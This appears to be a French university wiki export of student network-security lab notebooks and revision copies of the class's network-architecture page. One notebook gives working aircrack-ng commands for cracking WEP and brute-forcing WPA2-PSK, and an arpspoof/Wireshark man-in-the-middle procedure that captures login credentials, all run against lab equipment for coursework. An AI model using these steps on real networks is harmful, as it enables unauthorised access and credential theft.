[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

Fichier:Config Postfix mirage.png

2020-11-20T08:10:59Z

Aglaine :

TP sysres IMA2a5 2020/2021

2020-11-20T07:40:31Z

Aglaine : /* IP des VMs */

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Objectif du projet ==

La promotion 2020-2021 IMA2A5 réalise un système réseau répondant aux protocoles IPV6 et assurant une redondance matérielle.
La redondance matérielle se traduit par la mise en place de deux sites qui sont connectés et fonctionnent ensemble. Mais, si un des deux tombent en panne, le second récupère tout le travail et maintient le réseau.

D'un point de vue système, chacun a une machine virtuelle Xen assurant des services. Pour finir, en utilisant nos connaissances, un réseau Wifi et un site web sécurisés seront installés.

== Répartition des binômes ==

{| class="wikitable"
! Cahier !! Elèves
|-
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]
| SAWICZ Lionel
|-
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]
| HERBOMEL Guillaume
|-
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]
| CRAMETTE Samuel
|-
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]
| AVEZ Thibaut
|-
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]
| GLAINE Alexandre
|-
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]
| VITTECOQ Thomas
|-
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]
| CHENU Léna
|-
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]
| COULON Nathan
|-
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]
| DJAMBA Crispin
|}

== Description des connexions ==
Pour ce TP nous avons à notre disposition :

{| class="wikitable"
!Désignation !! Référence !! Autre !! Connexion
|-
|Routeur
|6509
|Equipé de deux Hyperviseurs SUP720 avec x02 interfaces Giga et x02 TenGiga
|Connecté au réseau de Polytech pour accéder à internet via RENATER
|-
|Commutateur Cisco
|3560 E
|Equipement utilisé comme simple commutateur même s'il peut faire office de routeur
|Connecté au réseau de Polytech via la prise SR52-3/K16
|-
|Commutateur Cisco
|ISR 4331
|Utilisé comme portail dérobé en cas de défaillance du 3560E
|Connecté au SDSL connecter via la prise SR52-3/L04,
|-
|Serveur de virtualisation
|R540
|Abrite les machines virtuelles
|Relié au 6509 par liaison fibre LC/LC et au 3560-E par câble Ethernet
|}

NB: Nous avions eu à utiliser des modules SFP Giga et TenGiga Cisco de type LC ou SC.
Pour répondre à l’objectif du TP : la redondance matérielle, nous avions entamé le raccordement des équipements. Cependant, cela a entraîné une utilisation abusive des ressources que nous disposions : 6 liaisons fibres pour nos connexions alors que 3 nous étaient allouées, une partie est réservée aux IMA5SC.

== Architecture matérielle ==

Dans un premier temps, nous nous sommes occupé de l'aspect Hardware du projet. Le but étant de connecter les différents éléments mis à disposition (Routeur 6509, Serveur de virtualisation R540 et commutateur 3560-E & ISR 4331) entre eux. Pour cela, nous nous sommes servis de la fibre mise à dispostion. En effet, le routeur 6509, composé des deux cartes de supervision doit être connectée au R540, au 3560-E ainsi qu'à l'ISR 4331 via une liaison fibre. Initialement, nous comptions connecter chaque carte de supervision aux autres éléments grâce à la fibre mis à disposition. Cela aurait donné le schéma ci-dessous :

=== Architecture matérielle Optimale ===

[[Fichier:Architecture-MA2a5-2020_2021.JPG]]

=== Architecture matérielle Réelle ===

Ainsi, grâce à cette configuration, il y aurait eu de la redondance entre les cartes de supervision et les autres éléments. De ce fait, si une des cartes de supervision était défectueuse, la seconde pourrait toujours communiquer avec le reste du système. Cependant, afin de se partager le matériel avec la seconde classe, nous ne pouvions utiliser que la moitié de la fibre mise à disposition. De ce fait, nous avons abouti à la configuration suivante :

[[Fichier:Architecture2-MA2a5-2020_2021.JPG]]

=== Architecture Réseau ===

[[Fichier:Architecture-Reseau-MA2a5-2020_2021.JPG]]

== Table d'adressage IP ==

=== Table du vlan1 ===

{| class="wikitable"
!Nom de l'appareil !! IP
|-
|6509
|10.60.0.1
|-
|3560 E
|10.60.0.2
|-
|Mask
|255.255.255.0
|}

=== Table du vlan2 ===

{| class="wikitable"
!Nom de l'appareil !! IP !! nom VM
|-
|6509
|193.48.57.161
|X
|-
|3560 E
|193.48.57.162
|X
|-
|routeur virtuel
|193.48.57.163
|X
|-
|Lionel
|193.48.57.164
|Rafale
|-
|Guillaume
|193.48.57.165
|Concorde
|-
|Samuel
|193.48.57.166
|Blackbird
|-
|Thibaut
|193.48.57.167
|Falcon
|-
|Alexandre
|193.48.57.168
|Mirage
|-
|Thomas
|193.48.57.169
|Alpha_jet
|-
|Crispin
|193.48.57.170
|NightHawk
|-
|Léna
|193.48.57.171
|hawker
|-
|Nathan
|193.48.57.172
|Boeing
|-
|ISR
|193.48.57.173/28
|X
|-
|Mask
|255.255.255.240
|X
|-
|}

=== Table du vlan130 ===
{| class="wikitable"
!Nom de l'appareil !! IP
|-
|6509
|192.168.222.2
|-
|3560 E
|192.168.222.1
|-
|Mask
|255.255.255.248
|}

=== Table des vlan ===

{| class="wikitable"
!Nom !! Vlan
|-
|Lionel
|Vlan3
|-
|Guillaume
|Vlan4
|-
|Samuel
|Vlan5
|-
|Thibaut
|Vlan6
|-
|Alexandre
|Vlan7
|-
|Thomas
|Vlan8
|-
|Crispin
|Vlan9
|-
|Léna
|Vlan10
|-
|Nathan
|Vlan11
|-
|}

=== Table générale ===

{| class="wikitable"
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel
|-
|Administration
|Vlan1
|10.60.0.0/24
|
|10.60.0.1
|10.60.0.2
|
|-
|Xen
|Vlan2
|193.48.57.160/28
|2001:660:4401:60a2::0/64
|193.48.57.161
|193.48.57.162
|193.48.57.163
|-
|Groupe 1
|X
|X
|X
|X
|X
|X
|-
|Groupe 2
|X
|X
|X
|X
|X
|X
|-
|Groupe 3
|X
|X
|X
|X
|X
|X
|-
|Groupe 4
|X
|X
|X
|X
|X
|X
|-
|Groupe 5
|Vlan7
|193.48.57.168/24
|X
|X
|X
|X
|-
|Groupe 6
|X
|X
|X
|X
|X
|X
|-
|Groupe 7
|Vlan10
|10.60.7.0/24
|2001:660:4401:60aa::0/64
|10.60.7.1
|10.60.7.2
|10.60.7.3
|-
|Groupe 8
|Vlan11
|X
|2001:660:4401:60a2::4/64
|X
|X
|X
|-
|Groupe 9
|X
|X
|X
|X
|X
|X
|-
|Interconnexion
|X
|X
|Router1 : X // Router2 : X // Ecole : X
|X
|X
|
|-
|}

=== IP des VMs ===

{| class="wikitable"
!Nom de la VM !! IP de la VM
|-
|mirage
|193.48.57.168/24
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|}

=== Cartes de supervision ===

Problématique: Configuration et installation des OS des cartes de supervision

Etape 1: Vérifier l'existence d'OS sur les deux cartes.

Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes.
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)
-> 2ème carte: OS absent

Etape 2: Copie du fichier d'OS

[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]

Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la première carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxième carte de supervision.

copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:

Etape 3: Reboot de la deuxième carte

Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur.

boot
sh ver

Etape 4: Vérification de la redondance

La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active

== Configuration machine Xen sur Capbreton ==

- Connexion de l'écran, clavier, souris sur le serveur
- Commande "lbslk" permettant de voir les partitions sur la machine
Il y a 2 disques de 500go qui forme un volume répartie de la façon suivante : 900Go pour Xen et 100Go pour le système.
Il y a 1 disque SDA avec 800go de libre.
Deux disques plus lent sont utilisé pour LVM.
- On souhaite déplacer les disques présent dans l'ancien serveur vers le serveur Capbreton cependant il faut s'assurer que les berceaux sont les même.
Dans notre cas les berceaux ne sont pas les mêmes nous n'avons pas pu les insérer

Concernant le brigde, nous avons vu dans /etc/network/interfaces "brigde_ports eth1 eth7". Nous devons connecter eth1 et eth7. Pour connaître où sont les interfaces sur le serveur nous avons utilisé la commande:
ethtool -p eth7
ethtool -p eth1

On a pu constater que eth7 correspond à la connexion en fibre optique et eth1 est la connexion cuivre

TP sysres IMA2a5 2020/2021

2020-11-20T07:40:19Z

Aglaine : /* IP des VMs */

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Objectif du projet ==

La promotion 2020-2021 IMA2A5 réalise un système réseau répondant aux protocoles IPV6 et assurant une redondance matérielle.
La redondance matérielle se traduit par la mise en place de deux sites qui sont connectés et fonctionnent ensemble. Mais, si un des deux tombent en panne, le second récupère tout le travail et maintient le réseau.

D'un point de vue système, chacun a une machine virtuelle Xen assurant des services. Pour finir, en utilisant nos connaissances, un réseau Wifi et un site web sécurisés seront installés.

== Répartition des binômes ==

{| class="wikitable"
! Cahier !! Elèves
|-
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]
| SAWICZ Lionel
|-
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]
| HERBOMEL Guillaume
|-
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]
| CRAMETTE Samuel
|-
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]
| AVEZ Thibaut
|-
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]
| GLAINE Alexandre
|-
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]
| VITTECOQ Thomas
|-
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]
| CHENU Léna
|-
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]
| COULON Nathan
|-
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]
| DJAMBA Crispin
|}

== Description des connexions ==
Pour ce TP nous avons à notre disposition :

{| class="wikitable"
!Désignation !! Référence !! Autre !! Connexion
|-
|Routeur
|6509
|Equipé de deux Hyperviseurs SUP720 avec x02 interfaces Giga et x02 TenGiga
|Connecté au réseau de Polytech pour accéder à internet via RENATER
|-
|Commutateur Cisco
|3560 E
|Equipement utilisé comme simple commutateur même s'il peut faire office de routeur
|Connecté au réseau de Polytech via la prise SR52-3/K16
|-
|Commutateur Cisco
|ISR 4331
|Utilisé comme portail dérobé en cas de défaillance du 3560E
|Connecté au SDSL connecter via la prise SR52-3/L04,
|-
|Serveur de virtualisation
|R540
|Abrite les machines virtuelles
|Relié au 6509 par liaison fibre LC/LC et au 3560-E par câble Ethernet
|}

NB: Nous avions eu à utiliser des modules SFP Giga et TenGiga Cisco de type LC ou SC.
Pour répondre à l’objectif du TP : la redondance matérielle, nous avions entamé le raccordement des équipements. Cependant, cela a entraîné une utilisation abusive des ressources que nous disposions : 6 liaisons fibres pour nos connexions alors que 3 nous étaient allouées, une partie est réservée aux IMA5SC.

== Architecture matérielle ==

Dans un premier temps, nous nous sommes occupé de l'aspect Hardware du projet. Le but étant de connecter les différents éléments mis à disposition (Routeur 6509, Serveur de virtualisation R540 et commutateur 3560-E & ISR 4331) entre eux. Pour cela, nous nous sommes servis de la fibre mise à dispostion. En effet, le routeur 6509, composé des deux cartes de supervision doit être connectée au R540, au 3560-E ainsi qu'à l'ISR 4331 via une liaison fibre. Initialement, nous comptions connecter chaque carte de supervision aux autres éléments grâce à la fibre mis à disposition. Cela aurait donné le schéma ci-dessous :

=== Architecture matérielle Optimale ===

